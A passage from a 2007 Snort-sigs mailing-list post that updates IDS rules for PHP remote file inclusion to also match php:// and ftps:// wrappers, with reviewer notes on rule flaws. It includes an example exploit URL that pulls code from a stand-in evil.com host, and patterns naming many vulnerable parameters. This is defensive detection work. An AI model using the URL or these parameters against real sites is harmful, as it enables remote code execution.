[Snort-sigs] PHP remote include sigs (part II)

Jamie Riden jamie.riden at ...2420...
Wed May 30 06:04:45 EDT 2007


Hi there,

[part II - bleeding rules this time]

A lot of the PHP remote file include sigs only match the http, https and
ftp schemes, using something like pcre:"/=\s*(https?|ftp)\:\//Ui".

It turns out that PHP also ships with the following URL schemes (stream
wrappers) enabled by default:
php://filter/resource=http://www.example.com and
ftps://ftp.example.com. A brief test seems to confirm that these work
just as well as http for file inclusion, so the pattern above does not
match them.

i.e. an exploit URL that the existing pattern does not match would be something like:
http://www.victim.com/vuln.php?include=php://filter/resource=http://www.evil.com

In which case, you'd need to change the matches to
pcre:"/=\s*(https?|ftps?|php)\:\//Ui" throughout to catch all the
default exploitable conditions (ftps? covers both ftp and ftps, and php
covers the php:// wrapper). I have tested this briefly, but a
sanity check would be welcome. The updated rules follow below.

cheers,
 Jamie

# Aardvark Topsites remote file include (CVE-2006-2149): fires on join.php or
# lostpw.php requests whose CONFIG[path] value begins with php:, ftp(s): or
# http(s):.
# NOTE(review): the second pcre requires a literal "&" before CONFIG[path], so
# a request that carries it as the first query parameter (directly after "?")
# is not matched. It also omits the \s* after "=" and the trailing \/ that most
# other rules in this list use. Confirm both are intentional.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Aardvark Topsites PHP CONFIG[PATH] Remote
File Include Attempt"; flow:established,to_server;
uricontent:"CONFIG[PATH]="; nocase; pcre:"/(join|lostpw)\.php\?/Ui";
pcre:"/&CONFIG\x5bpath\x5d=(php|ftps?|https?)\:/Ui";
reference:cve,CVE-2006-2149; reference:url,www.osvdb.org/25158;
classtype:web-application-attack; sid:2002901; rev:2;)
# CGX mtdialogo.php remote include via the pathCGX parameter (CVE-2007-2611).
# NOTE(review): the pcre is not tied to pathCGX=. Once both uricontent strings
# are present, any parameter whose value starts with one of these schemes
# satisfies it, which can alert on benign requests that pass a URL in another
# parameter. Anchoring the pcre to the parameter name, as the root_path= and
# vwar_root= rules in this list do, would tighten the match. The same applies
# to every rule here that uses the bare /=\s*(...)\:\// form.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- mtdialogo.php
pathCGX"; flow:established,to_server; uricontent:"/mtdialogo.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(php|https?|ftps?)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003726; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- ltdialogo.php
pathCGX"; flow:established,to_server; uricontent:"/ltdialogo.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003727; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- login.php
pathCGX"; flow:established,to_server; uricontent:"/login.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003729; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- logingecon.php
pathCGX"; flow:established,to_server;
uricontent:"/inc/logingecon.php?"; nocase; uricontent:"pathCGX=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003728; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CJG Explorer Remote Inclusion Attempt --
pcltrace.lib.php g_pcltar_lib_dir"; flow:established,to_server;
uricontent:"/pcltrace.lib.php?"; nocase;
uricontent:"g_pcltar_lib_dir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2660;
reference:url,www.milw0rm.com/exploits/3915; sid:2003737; rev:3;)
# NOTE(review): msg and the uricontent keywords (templateid=, SELECT, FROM)
# describe SQL injection, but the pcre is the remote-include scheme match.
# As written the rule additionally requires a parameter value starting with an
# http(s), ftp(s) or php scheme before it fires, which a SQL injection request
# would not normally contain, so the rule is unlikely to alert on what its msg
# describes. It looks like the scheme substitution was applied to a
# non-include rule. The same pcre appears in the other CMS Made Simple rules
# in this list (sids 2003795-2003798 and 2003865). Confirm against the
# upstream rule before committing.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid SELECT"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"SELECT"; nocase; uricontent:"FROM"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003794; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid UNION SELECT"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003795; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid INSERT"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"INSERT"; nocase; uricontent:"INTO"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003796; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid DELETE"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"DELETE"; nocase; uricontent:"FROM"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003865; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid ASCII"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"ASCII("; nocase; uricontent:"SELECT"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003797; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid UPDATE"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"UPDATE"; nocase; uricontent:"SET"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003798; rev:3;)
# Cacti config_settings.php / top_graph_header.php: alerts when any parameter
# value after the "?" starts with one of the listed schemes.
# NOTE(review): content:"GET"; depth:3 restricts this rule to payloads that
# begin with GET, so the same parameters sent with another HTTP method are not
# inspected. The classtype is web-application-activity, unlike the
# web-application-attack used by the other include rules in this list.
# Confirm both are intended.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE Cacti Input Validation Attack";
flow:established,to_server; content:"GET"; depth:3; nocase;
pcre:"/(config_settings|top_graph_header)\.php\?.*=(https?|ftps?|php)\:\//Ui";
classtype:web-application-activity; reference:url,www.cacti.net;
reference:url,www.idefense.com/application/poi/display?id=265&type=vulnerabilities;
reference:url,www.idefense.com/application/poi/display?id=266&type=vulnerabilities;
sid:2002129; rev:6;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB DynamicPAD Remote Inclusion Attempt --
dp_logs.php HomeDir"; flow:established,to_server;
uricontent:"/dp_logs.php?"; nocase; uricontent:"HomeDir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2527;
reference:url,milw0rm.com/exploits/3868; sid:2003679; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB DynamicPAD Remote Inclusion Attempt --
index.php HomeDir"; flow:established,to_server;
uricontent:"/index.php?"; nocase; uricontent:"HomeDir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2527;
reference:url,milw0rm.com/exploits/3868; sid:2003680; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB E-Gads Remote Inclusion Attempt -- common.php
locale"; flow:established,to_server; uricontent:"/common.php?";
nocase; uricontent:"locale="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2521;
reference:url,www.milw0rm.com/exploits/3846; sid:2003682; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Firefly Remote Inclusion Attempt -- config.php
DOCUMENT_ROOT"; flow:established,to_server;
uricontent:"/modules/admin/include/config.php?"; nocase;
uricontent:"DOCUMENT_ROOT="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2460;
reference:url,www.frsirt.com/english/advisories/2007/1554;
sid:2003690; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Gnopaster Common.php remote file include";
flow:established,to_server; uricontent:"/includes/common.php"; nocase;
pcre:"/root_path=\s*(ftps?|https?|php)\:\//Ui";
reference:bugtraq,18180; classtype:web-application-attack;
sid:2003333; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB LaVague Remote Inclusion Attempt --
printbar.php views_path"; flow:established,to_server;
uricontent:"/views/print/printbar.php?"; nocase;
uricontent:"views_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2607;
reference:url,www.milw0rm.com/exploits/3870; sid:2003716; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Generic membreManager.php remote file
include"; flow:established,to_server;
uricontent:"/membres/membreManager.php"; nocase;
pcre:"/include_path=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22287; classtype:web-application-attack;
sid:2003331; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB miplex2 Remote Inclusion SmartyFU.class.php
system"; flow:established,to_server;
uricontent:"/lib/smarty/SmartyFU.class.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2608;
reference:url,www.milw0rm.com/exploits/3878; sid:2003717; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Open Translation Engine Remote Inclusion
Attempt -- header.php ote_home"; flow:established,to_server;
uricontent:"/skins/header.php?"; nocase; uricontent:"ote_home=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2676;
reference:url,www.milw0rm.com/exploits/3838; sid:2003741; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
language.php config"; flow:established,to_server;
uricontent:"/includes/language.php?"; nocase; uricontent:"config=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003742; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_admin_cfg.php Root_Path"; flow:established,to_server;
uricontent:"/layout_admin_cfg.php?"; nocase; uricontent:"Root_Path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003743; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_cfg.php Root_Path"; flow:established,to_server;
uricontent:"/layout_cfg.php?"; nocase; uricontent:"Root_Path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003744; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_t_top.php Root_Path"; flow:established,to_server;
uricontent:"/skins/phpchess/layout_t_top.php?"; nocase;
uricontent:"Root_Path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003745; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPEventMan remote file include";
flow:established,to_server; uricontent:"/controller/"; nocase;
pcre:"/(text\.ctrl\.php|common\.function\.php)\?level=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22358; classtype:web-application-attack;
sid:2003372; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPFirstPost Remote Inclusion Attempt
block.php Include"; flow:established,to_server;
uricontent:"/block.php?"; nocase; uricontent:"Include="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2665;
reference:url,www.milw0rm.com/exploits/3906; sid:2003740; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPHtmlLib Remote Inclusion Attempt --
widget8.php phphtmllib"; flow:established,to_server;
uricontent:"/examples/widget8.php?"; nocase; uricontent:"phphtmllib=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2614;
reference:url,www.securityfocus.com/archive/1/archive/1/467837/100/0/threaded;
sid:2003730; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
ftp.php path_local"; flow:established,to_server;
uricontent:"/ftp.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003731; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
db.php path_local"; flow:established,to_server;
uricontent:"/libs/db.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003732; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
libs_ftp.php path_local"; flow:established,to_server;
uricontent:"/libs/ftp.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003733; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB phpMyPortal Remote Inclusion Attempt --
articles.inc.php GLOBALS[CHEMINMODULES]"; flow:established,to_server;
uricontent:"/inc/articles.inc.php?"; nocase;
uricontent:"GLOBALS[CHEMINMODULES]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2594;
reference:url,www.milw0rm.com/exploits/3879; sid:2003703; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPSecurityAdmin Remote Inclusion Attempt --
logout.php PSA_PATH"; flow:established,to_server;
uricontent:"/include/logout.php?"; nocase; uricontent:"PSA_PATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2628;
reference:url,www.securityfocus.com/bid/23801; sid:2003735; rev:3;)
# Generic PHP remote-include rule: a GET request for a ".php?" URI that
# contains "=<scheme>:/" and also the string "cmd=".
# NOTE(review): the "nocase;" directly after the pcre is redundant at best,
# since the pcre already carries /i and the preceding uricontent has its own
# nocase. Confirm the rule still loads cleanly. Also confirm which preceding
# match "within: 100" is measured from, since the pcre runs on the normalised
# URI (U) while content:"cmd=" runs on the payload.
# Unlike most rules in this list, the pcre has no \s* after "=", and the rule
# only covers GET.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:
"BLEEDING-EDGE EXPLOIT WEB PHP remote file include exploit attempt";
flow: to_server,established; content:"GET"; nocase; depth:3;
uricontent:".php?"; nocase; pcre:"/=(https?|ftps?|php)\:\//Ui";
nocase; content:"cmd="; nocase; within: 100; classtype:
attempted-admin; sid: 2001810; rev:10; )
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (
msg:"BLEEDING-EDGE WEB PHP PHPNuke Remote File Inclusion Attempt";
flow:established,to_server; uricontent:"/iframe.php"; nocase;
uricontent:"file="; nocase; pcre:"/file=\s*(ftps?|php|https?)\:\//Ui";
reference:url,www.zone-h.org/en/advisories/read/id=8694/;
classtype:web-application-attack; sid:2002800; rev:3; )
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Turbulence Remote Inclusion Attempt --
turbulence.php GLOBALS[tcore]"; flow:established,to_server;
uricontent:"/user/turbulence.php?"; nocase;
uricontent:"GLOBALS[tcore]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2504;
reference:url,www.securityfocus.com/bid/23580; sid:2003683; rev:3;)
# Web Calendar send_reminders.php remote include via the includedir parameter.
# The pcre is anchored to the parameter name, so only includedir= values are
# tested for a remote scheme.
# NOTE(review): reference:cve,2005-2717 omits the "CVE-" prefix that most cve
# references in this list carry (the two VWar rules, sids 2002899 and 2002902,
# do the same). Pick one form so the references are consistent.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Web Calendar Remote File Inclusion
Attempt"; flow:established,to_server;
uricontent:"/send_reminders.php"; nocase;
pcre:"/includedir=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,14651; reference:cve,2005-2717;
classtype:web-application-attack; sid:2002898; rev:4;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPtree Remote Inclusion Attempt -- cms2.php
s_dir"; flow:established,to_server;
uricontent:"/plugin/HP_DEV/cms2.php?"; nocase; uricontent:"s_dir=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2573;
reference:url,www.milw0rm.com/exploits/3860; sid:2003693; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_image_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/image/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003672; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_liens_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/liens/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003673; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_liste_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/liste/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003674; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_special_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/special/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003675; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_texte_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/texte/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003676; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt -
Headerfile.php System"; flow:established,to_server;
uricontent:"/blocks/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003660; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_files.php System"; flow:established,to_server;
uricontent:"/files/blocks/latest_files.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003661; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_posts.php System"; flow:established,to_server;
uricontent:"/forums/blocks/latest_posts.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003662; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
groups_headerfile.php System"; flow:established,to_server;
uricontent:"/groups/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003663; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
filters_headerfile.php System"; flow:established,to_server;
uricontent:"/filters/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003664; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
links.php System"; flow:established,to_server;
uricontent:"/links/blocks/links.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003665; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
menu_headerfile.php System"; flow:established,to_server;
uricontent:"/menu/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003666; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_news.php System"; flow:established,to_server;
uricontent:"/news/blocks/latest_news.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003667; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
settings_headerfile.php System"; flow:established,to_server;
uricontent:"/settings/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003668; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
users_headerfile.php System"; flow:established,to_server;
uricontent:"/modules/users/headerfile.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003681; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Pixaria Gallery Remote Inclusion Attempt --
psg.smarty.lib.php cfg[sys][base_path]"; flow:established,to_server;
uricontent:"/psg.smarty.lib.php?"; nocase;
uricontent:"cfg[sys][base_path]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2458;
reference:url,www.frsirt.com/english/advisories/2007/1390;
sid:2003691; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Pixaria Gallery Remote Inclusion
class.Smarty.php cfg[sys][base_path]"; flow:established,to_server;
uricontent:"/resources/includes/class.Smarty.php?"; nocase;
uricontent:"cfg[sys][base_path]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2457;
reference:url,www.milw0rm.com/exploits/3733; sid:2003702; rev:3;)
# Plume CMS prepend.php remote include via _px_config[manager_path]
# (CVE-2006-0725).
# NOTE(review): unlike the other rules in this list, the parameter is matched
# with content: and a pcre without the U modifier, i.e. not against the
